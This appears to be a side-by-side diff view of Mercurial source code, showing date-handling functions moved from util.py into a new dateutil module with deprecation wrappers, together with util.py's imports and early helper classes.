2311 | timestamp = time.time() |
|
|||
2312 | if timestamp < 0: |
|
|||
2313 | hint = _("check your clock") |
|
|||
2314 | raise Abort(_("negative timestamp: %d") % timestamp, hint=hint) |
|
|||
2315 | delta = (datetime.datetime.utcfromtimestamp(timestamp) - |
|
|||
2316 | datetime.datetime.fromtimestamp(timestamp)) |
|
|||
2317 | tz = delta.days * 86400 + delta.seconds |
|
|||
2318 | return timestamp, tz |
|
|||
2319 |
|
||||
2320 | def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'): |
|
|||
2321 | """represent a (unixtime, offset) tuple as a localized time. |
|
|||
2322 | unixtime is seconds since the epoch, and offset is the time zone's |
|
|||
2323 | number of seconds away from UTC. |
|
|||
2324 |
|
||||
2325 | >>> datestr((0, 0)) |
|
|||
2326 | 'Thu Jan 01 00:00:00 1970 +0000' |
|
|||
2327 | >>> datestr((42, 0)) |
|
|||
2328 | 'Thu Jan 01 00:00:42 1970 +0000' |
|
|||
2329 | >>> datestr((-42, 0)) |
|
|||
2330 | 'Wed Dec 31 23:59:18 1969 +0000' |
|
|||
2331 | >>> datestr((0x7fffffff, 0)) |
|
|||
2332 | 'Tue Jan 19 03:14:07 2038 +0000' |
|
|||
2333 | >>> datestr((-0x80000000, 0)) |
|
|||
2334 | 'Fri Dec 13 20:45:52 1901 +0000' |
|
|||
2335 | """ |
|
|||
2336 | t, tz = date or makedate() |
|
|||
2337 | if "%1" in format or "%2" in format or "%z" in format: |
|
|||
2338 | sign = (tz > 0) and "-" or "+" |
|
|||
2339 | minutes = abs(tz) // 60 |
|
|||
2340 | q, r = divmod(minutes, 60) |
|
|||
2341 | format = format.replace("%z", "%1%2") |
|
|||
2342 | format = format.replace("%1", "%c%02d" % (sign, q)) |
|
|||
2343 | format = format.replace("%2", "%02d" % r) |
|
|||
2344 | d = t - tz |
|
|||
2345 | if d > 0x7fffffff: |
|
|||
2346 | d = 0x7fffffff |
|
|||
2347 | elif d < -0x80000000: |
|
|||
2348 | d = -0x80000000 |
|
|||
2349 | # Never use time.gmtime() and datetime.datetime.fromtimestamp() |
|
|||
2350 | # because they use the gmtime() system call which is buggy on Windows |
|
|||
2351 | # for negative values. |
|
|||
2352 | t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d) |
|
|||
2353 | s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format))) |
|
|||
2354 | return s |
|
|||
2355 |
|
||||
2356 | def shortdate(date=None): |
|
|||
2357 | """turn (timestamp, tzoff) tuple into iso 8631 date.""" |
|
|||
2358 | return datestr(date, format='%Y-%m-%d') |
|
|||
2359 |
|
||||
2360 | def parsetimezone(s): |
|
|||
2361 | """find a trailing timezone, if any, in string, and return a |
|
|||
2362 | (offset, remainder) pair""" |
|
|||
2363 | s = pycompat.bytestr(s) |
|
|||
2364 |
|
||||
2365 | if s.endswith("GMT") or s.endswith("UTC"): |
|
|||
2366 | return 0, s[:-3].rstrip() |
|
|||
2367 |
|
||||
2368 | # Unix-style timezones [+-]hhmm |
|
|||
2369 | if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit(): |
|
|||
2370 | sign = (s[-5] == "+") and 1 or -1 |
|
|||
2371 | hours = int(s[-4:-2]) |
|
|||
2372 | minutes = int(s[-2:]) |
|
|||
2373 | return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip() |
|
|||
2374 |
|
||||
2375 | # ISO8601 trailing Z |
|
|||
2376 | if s.endswith("Z") and s[-2:-1].isdigit(): |
|
|||
2377 | return 0, s[:-1] |
|
|||
2378 |
|
||||
2379 | # ISO8601-style [+-]hh:mm |
|
|||
2380 | if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and |
|
|||
2381 | s[-5:-3].isdigit() and s[-2:].isdigit()): |
|
|||
2382 | sign = (s[-6] == "+") and 1 or -1 |
|
|||
2383 | hours = int(s[-5:-3]) |
|
|||
2384 | minutes = int(s[-2:]) |
|
|||
2385 | return -sign * (hours * 60 + minutes) * 60, s[:-6] |
|
|||
2386 |
|
||||
2387 | return None, s |
|
|||
2388 |
|
||||
2389 | def strdate(string, format, defaults=None): |
|
|||
2390 | """parse a localized time string and return a (unixtime, offset) tuple. |
|
|||
2391 | if the string cannot be parsed, ValueError is raised.""" |
|
|||
2392 | if defaults is None: |
|
|||
2393 | defaults = {} |
|
|||
2394 |
|
||||
2395 | # NOTE: unixtime = localunixtime + offset |
|
|||
2396 | offset, date = parsetimezone(string) |
|
|||
2397 |
|
||||
2398 | # add missing elements from defaults |
|
|||
2399 | usenow = False # default to using biased defaults |
|
|||
2400 | for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity |
|
|||
2401 | part = pycompat.bytestr(part) |
|
|||
2402 | found = [True for p in part if ("%"+p) in format] |
|
|||
2403 | if not found: |
|
|||
2404 | date += "@" + defaults[part][usenow] |
|
|||
2405 | format += "@%" + part[0] |
|
|||
2406 | else: |
|
|||
2407 | # We've found a specific time element, less specific time |
|
|||
2408 | # elements are relative to today |
|
|||
2409 | usenow = True |
|
|||
2410 |
|
||||
2411 | timetuple = time.strptime(encoding.strfromlocal(date), |
|
|||
2412 | encoding.strfromlocal(format)) |
|
|||
2413 | localunixtime = int(calendar.timegm(timetuple)) |
|
|||
2414 | if offset is None: |
|
|||
2415 | # local timezone |
|
|||
2416 | unixtime = int(time.mktime(timetuple)) |
|
|||
2417 | offset = unixtime - localunixtime |
|
|||
2418 | else: |
|
|||
2419 | unixtime = localunixtime + offset |
|
|||
2420 | return unixtime, offset |
|
|||
2421 |
|
||||
2422 | def parsedate(date, formats=None, bias=None): |
|
|||
2423 | """parse a localized date/time and return a (unixtime, offset) tuple. |
|
|||
2424 |
|
||||
2425 | The date may be a "unixtime offset" string or in one of the specified |
|
|||
2426 | formats. If the date already is a (unixtime, offset) tuple, it is returned. |
|
|||
2427 |
|
||||
2428 | >>> parsedate(b' today ') == parsedate( |
|
|||
2429 | ... datetime.date.today().strftime('%b %d').encode('ascii')) |
|
|||
2430 | True |
|
|||
2431 | >>> parsedate(b'yesterday ') == parsedate( |
|
|||
2432 | ... (datetime.date.today() - datetime.timedelta(days=1) |
|
|||
2433 | ... ).strftime('%b %d').encode('ascii')) |
|
|||
2434 | True |
|
|||
2435 | >>> now, tz = makedate() |
|
|||
2436 | >>> strnow, strtz = parsedate(b'now') |
|
|||
2437 | >>> (strnow - now) < 1 |
|
|||
2438 | True |
|
|||
2439 | >>> tz == strtz |
|
|||
2440 | True |
|
|||
2441 | """ |
|
|||
2442 | if bias is None: |
|
|||
2443 | bias = {} |
|
|||
2444 | if not date: |
|
|||
2445 | return 0, 0 |
|
|||
2446 | if isinstance(date, tuple) and len(date) == 2: |
|
|||
2447 | return date |
|
|||
2448 | if not formats: |
|
|||
2449 | formats = defaultdateformats |
|
|||
2450 | date = date.strip() |
|
|||
2451 |
|
||||
2452 | if date == 'now' or date == _('now'): |
|
|||
2453 | return makedate() |
|
|||
2454 | if date == 'today' or date == _('today'): |
|
|||
2455 | date = datetime.date.today().strftime(r'%b %d') |
|
|||
2456 | date = encoding.strtolocal(date) |
|
|||
2457 | elif date == 'yesterday' or date == _('yesterday'): |
|
|||
2458 | date = (datetime.date.today() - |
|
|||
2459 | datetime.timedelta(days=1)).strftime(r'%b %d') |
|
|||
2460 | date = encoding.strtolocal(date) |
|
|||
2461 |
|
||||
2462 | try: |
|
|||
2463 | when, offset = map(int, date.split(' ')) |
|
|||
2464 | except ValueError: |
|
|||
2465 | # fill out defaults |
|
|||
2466 | now = makedate() |
|
|||
2467 | defaults = {} |
|
|||
2468 | for part in ("d", "mb", "yY", "HI", "M", "S"): |
|
|||
2469 | # this piece is for rounding the specific end of unknowns |
|
|||
2470 | b = bias.get(part) |
|
|||
2471 | if b is None: |
|
|||
2472 | if part[0:1] in "HMS": |
|
|||
2473 | b = "00" |
|
|||
2474 | else: |
|
|||
2475 | b = "0" |
|
|||
2476 |
|
||||
2477 | # this piece is for matching the generic end to today's date |
|
|||
2478 | n = datestr(now, "%" + part[0:1]) |
|
|||
2479 |
|
||||
2480 | defaults[part] = (b, n) |
|
|||
2481 |
|
||||
2482 | for format in formats: |
|
|||
2483 | try: |
|
|||
2484 | when, offset = strdate(date, format, defaults) |
|
|||
2485 | except (ValueError, OverflowError): |
|
|||
2486 | pass |
|
|||
2487 | else: |
|
|||
2488 | break |
|
|||
2489 | else: |
|
|||
2490 | raise error.ParseError( |
|
|||
2491 | _('invalid date: %r') % pycompat.bytestr(date)) |
|
|||
2492 | # validate explicit (probably user-specified) date and |
|
|||
2493 | # time zone offset. values must fit in signed 32 bits for |
|
|||
2494 | # current 32-bit linux runtimes. timezones go from UTC-12 |
|
|||
2495 | # to UTC+14 |
|
|||
2496 | if when < -0x80000000 or when > 0x7fffffff: |
|
|||
2497 | raise error.ParseError(_('date exceeds 32 bits: %d') % when) |
|
|||
2498 | if offset < -50400 or offset > 43200: |
|
|||
2499 | raise error.ParseError(_('impossible time zone offset: %d') % offset) |
|
|||
2500 | return when, offset |
|
|||
2501 |
|
||||
2502 | def matchdate(date): |
|
|||
2503 | """Return a function that matches a given date match specifier |
|
|||
2504 |
|
||||
2505 | Formats include: |
|
|||
2506 |
|
||||
2507 | '{date}' match a given date to the accuracy provided |
|
|||
2508 |
|
||||
2509 | '<{date}' on or before a given date |
|
|||
2510 |
|
||||
2511 | '>{date}' on or after a given date |
|
|||
2512 |
|
||||
2513 | >>> p1 = parsedate(b"10:29:59") |
|
|||
2514 | >>> p2 = parsedate(b"10:30:00") |
|
|||
2515 | >>> p3 = parsedate(b"10:30:59") |
|
|||
2516 | >>> p4 = parsedate(b"10:31:00") |
|
|||
2517 | >>> p5 = parsedate(b"Sep 15 10:30:00 1999") |
|
|||
2518 | >>> f = matchdate(b"10:30") |
|
|||
2519 | >>> f(p1[0]) |
|
|||
2520 | False |
|
|||
2521 | >>> f(p2[0]) |
|
|||
2522 | True |
|
|||
2523 | >>> f(p3[0]) |
|
|||
2524 | True |
|
|||
2525 | >>> f(p4[0]) |
|
|||
2526 | False |
|
|||
2527 | >>> f(p5[0]) |
|
|||
2528 | False |
|
|||
2529 | """ |
|
|||
2530 |
|
||||
2531 | def lower(date): |
|
|||
2532 | d = {'mb': "1", 'd': "1"} |
|
|||
2533 | return parsedate(date, extendeddateformats, d)[0] |
|
|||
2534 |
|
||||
2535 | def upper(date): |
|
|||
2536 | d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"} |
|
|||
2537 | for days in ("31", "30", "29"): |
|
|||
2538 | try: |
|
|||
2539 | d["d"] = days |
|
|||
2540 | return parsedate(date, extendeddateformats, d)[0] |
|
|||
2541 | except error.ParseError: |
|
|||
2542 | pass |
|
|||
2543 | d["d"] = "28" |
|
|||
2544 | return parsedate(date, extendeddateformats, d)[0] |
|
|||
2545 |
|
||||
2546 | date = date.strip() |
|
|||
2547 |
|
||||
2548 | if not date: |
|
|||
2549 | raise Abort(_("dates cannot consist entirely of whitespace")) |
|
|||
2550 | elif date[0] == "<": |
|
|||
2551 | if not date[1:]: |
|
|||
2552 | raise Abort(_("invalid day spec, use '<DATE'")) |
|
|||
2553 | when = upper(date[1:]) |
|
|||
2554 | return lambda x: x <= when |
|
|||
2555 | elif date[0] == ">": |
|
|||
2556 | if not date[1:]: |
|
|||
2557 | raise Abort(_("invalid day spec, use '>DATE'")) |
|
|||
2558 | when = lower(date[1:]) |
|
|||
2559 | return lambda x: x >= when |
|
|||
2560 | elif date[0] == "-": |
|
|||
2561 | try: |
|
|||
2562 | days = int(date[1:]) |
|
|||
2563 | except ValueError: |
|
|||
2564 | raise Abort(_("invalid day spec: %s") % date[1:]) |
|
|||
2565 | if days < 0: |
|
|||
2566 | raise Abort(_("%s must be nonnegative (see 'hg help dates')") |
|
|||
2567 | % date[1:]) |
|
|||
2568 | when = makedate()[0] - days * 3600 * 24 |
|
|||
2569 | return lambda x: x >= when |
|
|||
2570 | elif " to " in date: |
|
|||
2571 | a, b = date.split(" to ") |
|
|||
2572 | start, stop = lower(a), upper(b) |
|
|||
2573 | return lambda x: x >= start and x <= stop |
|
|||
2574 | else: |
|
|||
2575 | start, stop = lower(date), upper(date) |
|
|||
2576 | return lambda x: x >= start and x <= stop |
|
|||
2577 |
|
||||
2578 | def stringmatcher(pattern, casesensitive=True): |
|
2264 | def stringmatcher(pattern, casesensitive=True): | |
2579 | """ |
|
2265 | """ | |
2580 | accepts a string, possibly starting with 're:' or 'literal:' prefix. |
|
2266 | accepts a string, possibly starting with 're:' or 'literal:' prefix. | |
@@ -4303,3 +3989,54 b' def uvarintdecodestream(fh):' | |||||
4303 | if not (byte & 0x80): |
|
3989 | if not (byte & 0x80): | |
4304 | return result |
|
3990 | return result | |
4305 | shift += 7 |
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3991 | shift += 7 | |
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3992 | ||||
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3993 | ### | |||
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3994 | # Deprecation warnings for util.py splitting | |||
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3995 | ### | |||
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3996 | ||||
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3997 | defaultdateformats = dateutil.defaultdateformats | |||
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3998 | ||||
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3999 | extendeddateformats = dateutil.extendeddateformats | |||
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4000 | ||||
|
4001 | def makedate(*args, **kwargs): | |||
|
4002 | msg = ("'util.makedate' is deprecated, " | |||
|
4003 | "use 'utils.dateutil.makedate'") | |||
|
4004 | nouideprecwarn(msg, "4.6") | |||
|
4005 | return dateutil.makedate(*args, **kwargs) | |||
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4006 | ||||
|
4007 | def datestr(*args, **kwargs): | |||
|
4008 | msg = ("'util.datestr' is deprecated, " | |||
|
4009 | "use 'utils.dateutil.datestr'") | |||
|
4010 | nouideprecwarn(msg, "4.6") | |||
|
4011 | debugstacktrace() | |||
|
4012 | return dateutil.datestr(*args, **kwargs) | |||
|
4013 | ||||
|
4014 | def shortdate(*args, **kwargs): | |||
|
4015 | msg = ("'util.shortdate' is deprecated, " | |||
|
4016 | "use 'utils.dateutil.shortdate'") | |||
|
4017 | nouideprecwarn(msg, "4.6") | |||
|
4018 | return dateutil.shortdate(*args, **kwargs) | |||
|
4019 | ||||
|
4020 | def parsetimezone(*args, **kwargs): | |||
|
4021 | msg = ("'util.parsetimezone' is deprecated, " | |||
|
4022 | "use 'utils.dateutil.parsetimezone'") | |||
|
4023 | nouideprecwarn(msg, "4.6") | |||
|
4024 | return dateutil.parsetimezone(*args, **kwargs) | |||
|
4025 | ||||
|
4026 | def strdate(*args, **kwargs): | |||
|
4027 | msg = ("'util.strdate' is deprecated, " | |||
|
4028 | "use 'utils.dateutil.strdate'") | |||
|
4029 | nouideprecwarn(msg, "4.6") | |||
|
4030 | return dateutil.strdate(*args, **kwargs) | |||
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4031 | ||||
|
4032 | def parsedate(*args, **kwargs): | |||
|
4033 | msg = ("'util.parsedate' is deprecated, " | |||
|
4034 | "use 'utils.dateutil.parsedate'") | |||
|
4035 | nouideprecwarn(msg, "4.6") | |||
|
4036 | return dateutil.parsedate(*args, **kwargs) | |||
|
4037 | ||||
|
4038 | def matchdate(*args, **kwargs): | |||
|
4039 | msg = ("'util.matchdate' is deprecated, " | |||
|
4040 | "use 'utils.dateutil.matchdate'") | |||
|
4041 | nouideprecwarn(msg, "4.6") | |||
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4042 | return dateutil.matchdate(*args, **kwargs) |
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1 | # util.py - Mercurial utility functions relative to dates | |
2 | # |
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2 | # | |
3 | # Copyright 2005 K. Thananchayan <thananck@yahoo.com> |
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3 | # Copyright 2018 Boris Feld <boris.feld@octobus.net> | |
4 | # Copyright 2005-2007 Matt Mackall <mpm@selenic.com> |
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5 | # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> |
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6 | # |
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4 | # | |
7 | # This software may be used and distributed according to the terms of the |
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5 | # This software may be used and distributed according to the terms of the | |
8 | # GNU General Public License version 2 or any later version. |
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6 | # GNU General Public License version 2 or any later version. | |
9 |
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7 | |||
10 | """Mercurial utility functions and platform specific implementations. |
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11 |
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12 | This contains helper routines that are independent of the SCM core and |
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13 | hide platform-specific details from the core. |
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14 | """ |
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15 |
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16 | from __future__ import absolute_import, print_function |
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8 | from __future__ import absolute_import, print_function | |
17 |
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9 | |||
18 | import abc |
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19 | import bz2 |
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20 | import calendar |
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10 | import calendar | |
21 | import codecs |
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22 | import collections |
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23 | import contextlib |
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24 | import datetime |
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11 | import datetime | |
25 | import errno |
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26 | import gc |
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27 | import hashlib |
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28 | import imp |
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29 | import io |
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30 | import itertools |
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31 | import mmap |
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32 | import os |
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33 | import platform as pyplatform |
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34 | import re as remod |
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35 | import shutil |
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36 | import signal |
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37 | import socket |
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38 | import stat |
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39 | import string |
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40 | import subprocess |
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41 | import sys |
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42 | import tempfile |
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43 | import textwrap |
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44 | import time |
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12 | import time | |
45 | import traceback |
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46 | import warnings |
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47 | import zlib |
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48 |
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13 | |||
49 |
from . import |
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14 | from ..i18n import _ | |
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15 | from .. import ( | |||
50 | encoding, |
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16 | encoding, | |
51 | error, |
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17 | error, | |
52 | i18n, |
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53 | node as nodemod, |
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54 | policy, |
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55 | pycompat, |
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18 | pycompat, | |
56 | urllibcompat, |
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57 | ) |
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19 | ) | |
58 |
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20 | |||
59 | base85 = policy.importmod(r'base85') |
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60 | osutil = policy.importmod(r'osutil') |
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61 | parsers = policy.importmod(r'parsers') |
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62 |
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63 | b85decode = base85.b85decode |
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64 | b85encode = base85.b85encode |
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65 |
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66 | cookielib = pycompat.cookielib |
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67 | empty = pycompat.empty |
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68 | httplib = pycompat.httplib |
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69 | pickle = pycompat.pickle |
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70 | queue = pycompat.queue |
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71 | socketserver = pycompat.socketserver |
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72 | stderr = pycompat.stderr |
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73 | stdin = pycompat.stdin |
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74 | stdout = pycompat.stdout |
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75 | stringio = pycompat.stringio |
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76 | xmlrpclib = pycompat.xmlrpclib |
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77 |
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78 | httpserver = urllibcompat.httpserver |
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79 | urlerr = urllibcompat.urlerr |
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80 | urlreq = urllibcompat.urlreq |
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81 |
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82 | # workaround for win32mbcs |
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83 | _filenamebytestr = pycompat.bytestr |
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84 |
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85 | def isatty(fp): |
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86 | try: |
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87 | return fp.isatty() |
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88 | except AttributeError: |
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89 | return False |
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90 |
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91 | # glibc determines buffering on first write to stdout - if we replace a TTY |
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92 | # destined stdout with a pipe destined stdout (e.g. pager), we want line |
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93 | # buffering |
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94 | if isatty(stdout): |
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95 | stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1) |
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96 |
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97 | if pycompat.iswindows: |
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98 | from . import windows as platform |
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99 | stdout = platform.winstdout(stdout) |
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100 | else: |
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101 | from . import posix as platform |
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102 |
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103 | _ = i18n._ |
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104 |
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105 | bindunixsocket = platform.bindunixsocket |
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106 | cachestat = platform.cachestat |
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107 | checkexec = platform.checkexec |
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108 | checklink = platform.checklink |
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109 | copymode = platform.copymode |
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110 | executablepath = platform.executablepath |
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111 | expandglobs = platform.expandglobs |
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112 | explainexit = platform.explainexit |
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113 | findexe = platform.findexe |
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114 | getfsmountpoint = platform.getfsmountpoint |
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115 | getfstype = platform.getfstype |
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116 | gethgcmd = platform.gethgcmd |
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117 | getuser = platform.getuser |
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118 | getpid = os.getpid |
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119 | groupmembers = platform.groupmembers |
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120 | groupname = platform.groupname |
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121 | hidewindow = platform.hidewindow |
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122 | isexec = platform.isexec |
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123 | isowner = platform.isowner |
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124 | listdir = osutil.listdir |
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125 | localpath = platform.localpath |
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126 | lookupreg = platform.lookupreg |
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127 | makedir = platform.makedir |
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128 | nlinks = platform.nlinks |
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129 | normpath = platform.normpath |
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130 | normcase = platform.normcase |
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131 | normcasespec = platform.normcasespec |
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132 | normcasefallback = platform.normcasefallback |
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133 | openhardlinks = platform.openhardlinks |
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134 | oslink = platform.oslink |
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135 | parsepatchoutput = platform.parsepatchoutput |
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136 | pconvert = platform.pconvert |
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137 | poll = platform.poll |
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138 | popen = platform.popen |
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139 | posixfile = platform.posixfile |
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140 | quotecommand = platform.quotecommand |
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141 | readpipe = platform.readpipe |
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142 | rename = platform.rename |
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143 | removedirs = platform.removedirs |
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144 | samedevice = platform.samedevice |
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145 | samefile = platform.samefile |
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146 | samestat = platform.samestat |
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147 | setbinary = platform.setbinary |
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148 | setflags = platform.setflags |
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149 | setsignalhandler = platform.setsignalhandler |
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150 | shellquote = platform.shellquote |
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151 | shellsplit = platform.shellsplit |
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152 | spawndetached = platform.spawndetached |
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153 | split = platform.split |
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154 | sshargs = platform.sshargs |
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155 | statfiles = getattr(osutil, 'statfiles', platform.statfiles) |
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156 | statisexec = platform.statisexec |
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157 | statislink = platform.statislink |
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158 | testpid = platform.testpid |
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159 | umask = platform.umask |
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160 | unlink = platform.unlink |
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161 | username = platform.username |
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162 |
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163 | try: |
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164 | recvfds = osutil.recvfds |
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165 | except AttributeError: |
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166 | pass |
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167 | try: |
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168 | setprocname = osutil.setprocname |
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169 | except AttributeError: |
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170 | pass |
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171 | try: |
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172 | unblocksignal = osutil.unblocksignal |
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173 | except AttributeError: |
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174 | pass |
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175 |
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176 | # Python compatibility |
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177 |
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178 | _notset = object() |
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179 |
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180 | # disable Python's problematic floating point timestamps (issue4836) |
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181 | # (Python hypocritically says you shouldn't change this behavior in |
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182 | # libraries, and sure enough Mercurial is not a library.) |
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183 | os.stat_float_times(False) |
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184 |
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185 | def safehasattr(thing, attr): |
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186 | return getattr(thing, attr, _notset) is not _notset |
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187 |
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188 | def _rapply(f, xs): |
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189 | if xs is None: |
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190 | # assume None means non-value of optional data |
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191 | return xs |
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192 | if isinstance(xs, (list, set, tuple)): |
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193 | return type(xs)(_rapply(f, x) for x in xs) |
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194 | if isinstance(xs, dict): |
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195 | return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items()) |
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196 | return f(xs) |
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197 |
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198 | def rapply(f, xs): |
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199 | """Apply function recursively to every item preserving the data structure |
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200 |
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201 | >>> def f(x): |
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202 | ... return 'f(%s)' % x |
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203 | >>> rapply(f, None) is None |
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204 | True |
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205 | >>> rapply(f, 'a') |
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206 | 'f(a)' |
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207 | >>> rapply(f, {'a'}) == {'f(a)'} |
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208 | True |
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209 | >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []]) |
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210 | ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []] |
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211 |
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212 | >>> xs = [object()] |
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213 | >>> rapply(pycompat.identity, xs) is xs |
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214 | True |
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215 | """ |
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216 | if f is pycompat.identity: |
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217 | # fast path mainly for py2 |
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218 | return xs |
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219 | return _rapply(f, xs) |
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220 |
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221 | def bytesinput(fin, fout, *args, **kwargs): |
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222 | sin, sout = sys.stdin, sys.stdout |
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223 | try: |
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224 | sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout) |
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225 | return encoding.strtolocal(pycompat.rawinput(*args, **kwargs)) |
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226 | finally: |
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227 | sys.stdin, sys.stdout = sin, sout |
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228 |
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229 | def bitsfrom(container): |
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230 | bits = 0 |
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231 | for bit in container: |
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232 | bits |= bit |
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233 | return bits |
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234 |
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235 | # python 2.6 still have deprecation warning enabled by default. We do not want |
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236 | # to display anything to standard user so detect if we are running test and |
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237 | # only use python deprecation warning in this case. |
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238 | _dowarn = bool(encoding.environ.get('HGEMITWARNINGS')) |
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239 | if _dowarn: |
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240 | # explicitly unfilter our warning for python 2.7 |
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241 | # |
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242 | # The option of setting PYTHONWARNINGS in the test runner was investigated. |
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243 | # However, module name set through PYTHONWARNINGS was exactly matched, so |
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244 | # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This |
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245 | # makes the whole PYTHONWARNINGS thing useless for our usecase. |
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246 | warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial') |
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247 | warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext') |
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248 | warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd') |
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249 | if _dowarn and pycompat.ispy3: |
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250 | # silence warning emitted by passing user string to re.sub() |
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251 | warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning, |
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252 | r'mercurial') |
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253 |
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254 | def nouideprecwarn(msg, version, stacklevel=1): |
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255 | """Issue an python native deprecation warning |
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256 |
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257 | This is a noop outside of tests, use 'ui.deprecwarn' when possible. |
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258 | """ |
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259 | if _dowarn: |
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260 | msg += ("\n(compatibility will be dropped after Mercurial-%s," |
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261 | " update your code.)") % version |
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262 | warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1) |
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263 |
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264 | DIGESTS = { |
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265 | 'md5': hashlib.md5, |
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266 | 'sha1': hashlib.sha1, |
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267 | 'sha512': hashlib.sha512, |
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268 | } |
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269 | # List of digest types from strongest to weakest |
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270 | DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5'] |
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271 |
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272 | for k in DIGESTS_BY_STRENGTH: |
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273 | assert k in DIGESTS |
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274 |
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275 | class digester(object): |
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276 | """helper to compute digests. |
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277 |
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278 | This helper can be used to compute one or more digests given their name. |
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279 |
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280 | >>> d = digester([b'md5', b'sha1']) |
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281 | >>> d.update(b'foo') |
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282 | >>> [k for k in sorted(d)] |
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283 | ['md5', 'sha1'] |
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284 | >>> d[b'md5'] |
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285 | 'acbd18db4cc2f85cedef654fccc4a4d8' |
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286 | >>> d[b'sha1'] |
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287 | '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33' |
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288 | >>> digester.preferred([b'md5', b'sha1']) |
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289 | 'sha1' |
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290 | """ |
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291 |
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292 | def __init__(self, digests, s=''): |
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293 | self._hashes = {} |
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294 | for k in digests: |
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295 | if k not in DIGESTS: |
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296 | raise Abort(_('unknown digest type: %s') % k) |
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297 | self._hashes[k] = DIGESTS[k]() |
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298 | if s: |
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299 | self.update(s) |
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300 |
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301 | def update(self, data): |
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302 | for h in self._hashes.values(): |
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303 | h.update(data) |
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304 |
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305 | def __getitem__(self, key): |
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306 | if key not in DIGESTS: |
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307 | raise Abort(_('unknown digest type: %s') % k) |
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308 | return nodemod.hex(self._hashes[key].digest()) |
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309 |
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310 | def __iter__(self): |
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311 | return iter(self._hashes) |
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312 |
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313 | @staticmethod |
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314 | def preferred(supported): |
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315 | """returns the strongest digest type in both supported and DIGESTS.""" |
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316 |
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317 | for k in DIGESTS_BY_STRENGTH: |
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318 | if k in supported: |
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319 | return k |
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320 | return None |
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321 |
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322 | class digestchecker(object): |
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323 | """file handle wrapper that additionally checks content against a given |
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324 | size and digests. |
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325 |
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326 | d = digestchecker(fh, size, {'md5': '...'}) |
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327 |
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328 | When multiple digests are given, all of them are validated. |
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329 | """ |
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330 |
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331 | def __init__(self, fh, size, digests): |
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332 | self._fh = fh |
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333 | self._size = size |
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334 | self._got = 0 |
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335 | self._digests = dict(digests) |
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336 | self._digester = digester(self._digests.keys()) |
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337 |
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338 | def read(self, length=-1): |
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339 | content = self._fh.read(length) |
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340 | self._digester.update(content) |
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341 | self._got += len(content) |
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342 | return content |
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343 |
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344 | def validate(self): |
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345 | if self._size != self._got: |
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346 | raise Abort(_('size mismatch: expected %d, got %d') % |
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347 | (self._size, self._got)) |
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348 | for k, v in self._digests.items(): |
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349 | if v != self._digester[k]: |
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350 | # i18n: first parameter is a digest name |
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351 | raise Abort(_('%s mismatch: expected %s, got %s') % |
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352 | (k, v, self._digester[k])) |
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353 |
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354 | try: |
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355 | buffer = buffer |
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356 | except NameError: |
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357 | def buffer(sliceable, offset=0, length=None): |
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358 | if length is not None: |
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359 | return memoryview(sliceable)[offset:offset + length] |
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360 | return memoryview(sliceable)[offset:] |
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361 |
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362 | closefds = pycompat.isposix |
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363 |
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364 | _chunksize = 4096 |
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365 |
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366 | class bufferedinputpipe(object): |
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367 | """a manually buffered input pipe |
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368 |
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369 | Python will not let us use buffered IO and lazy reading with 'polling' at |
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370 | the same time. We cannot probe the buffer state and select will not detect |
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371 | that data are ready to read if they are already buffered. |
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372 |
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373 | This class let us work around that by implementing its own buffering |
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374 | (allowing efficient readline) while offering a way to know if the buffer is |
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375 | empty from the output (allowing collaboration of the buffer with polling). |
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376 |
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377 | This class lives in the 'util' module because it makes use of the 'os' |
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378 | module from the python stdlib. |
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379 | """ |
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380 | def __new__(cls, fh): |
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381 | # If we receive a fileobjectproxy, we need to use a variation of this |
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382 | # class that notifies observers about activity. |
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383 | if isinstance(fh, fileobjectproxy): |
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384 | cls = observedbufferedinputpipe |
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385 |
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386 | return super(bufferedinputpipe, cls).__new__(cls) |
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387 |
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388 | def __init__(self, input): |
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389 | self._input = input |
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390 | self._buffer = [] |
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391 | self._eof = False |
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392 | self._lenbuf = 0 |
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393 |
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394 | @property |
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395 | def hasbuffer(self): |
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396 | """True is any data is currently buffered |
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397 |
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398 | This will be used externally a pre-step for polling IO. If there is |
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399 | already data then no polling should be set in place.""" |
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400 | return bool(self._buffer) |
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401 |
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402 | @property |
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403 | def closed(self): |
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404 | return self._input.closed |
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405 |
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406 | def fileno(self): |
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407 | return self._input.fileno() |
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408 |
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409 | def close(self): |
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410 | return self._input.close() |
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411 |
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412 | def read(self, size): |
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413 | while (not self._eof) and (self._lenbuf < size): |
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414 | self._fillbuffer() |
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415 | return self._frombuffer(size) |
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416 |
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417 | def readline(self, *args, **kwargs): |
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418 | if 1 < len(self._buffer): |
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419 | # this should not happen because both read and readline end with a |
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420 | # _frombuffer call that collapse it. |
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421 | self._buffer = [''.join(self._buffer)] |
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422 | self._lenbuf = len(self._buffer[0]) |
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423 | lfi = -1 |
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424 | if self._buffer: |
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425 | lfi = self._buffer[-1].find('\n') |
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426 | while (not self._eof) and lfi < 0: |
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427 | self._fillbuffer() |
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428 | if self._buffer: |
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429 | lfi = self._buffer[-1].find('\n') |
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430 | size = lfi + 1 |
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431 | if lfi < 0: # end of file |
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432 | size = self._lenbuf |
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433 | elif 1 < len(self._buffer): |
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434 | # we need to take previous chunks into account |
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435 | size += self._lenbuf - len(self._buffer[-1]) |
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436 | return self._frombuffer(size) |
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437 |
